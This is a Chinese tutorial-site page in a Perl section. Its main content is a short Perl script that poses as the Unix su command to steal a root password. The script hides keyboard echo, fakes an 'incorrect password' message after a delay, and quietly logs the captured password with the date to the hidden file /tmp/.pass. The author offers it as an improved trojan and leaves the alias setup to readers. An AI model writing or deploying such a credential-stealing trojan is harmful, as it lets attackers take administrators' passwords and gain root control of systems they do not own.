当前位置: 首页 > 图文教程 > 脚本技术 > Perl > 冒充su ,perl写的su.pl盗取root密码

Perl
不错的一篇学习CGI脚本(脚本)
详细说明什么是Perl
perl简单变量 整型 浮点数 字符串
perl操作符详细说明
perl 列表和数组变量详解
perl 文件读写详细说明
perl 模式匹配参数详解
perl 控制结构 条件控制 if while
perl 子程序 sub
Shell编程的一些知识集合
perl 学习资料整理篇
PERL脚本 学习笔记

Perl 中的 冒充su ,perl写的su.pl盗取root密码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 130 ::
收藏到网摘: n/a

backtrack3里面/pentest/housekeeping里面有个超囧的偷root密码的东西,冒充su ,perl写的,管理员输入密码的时候还直接回显 我改了一下,把回显关了 加了个延时:
#!/usr/bin/perl
# Written by xi4oyu <[email protected]>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!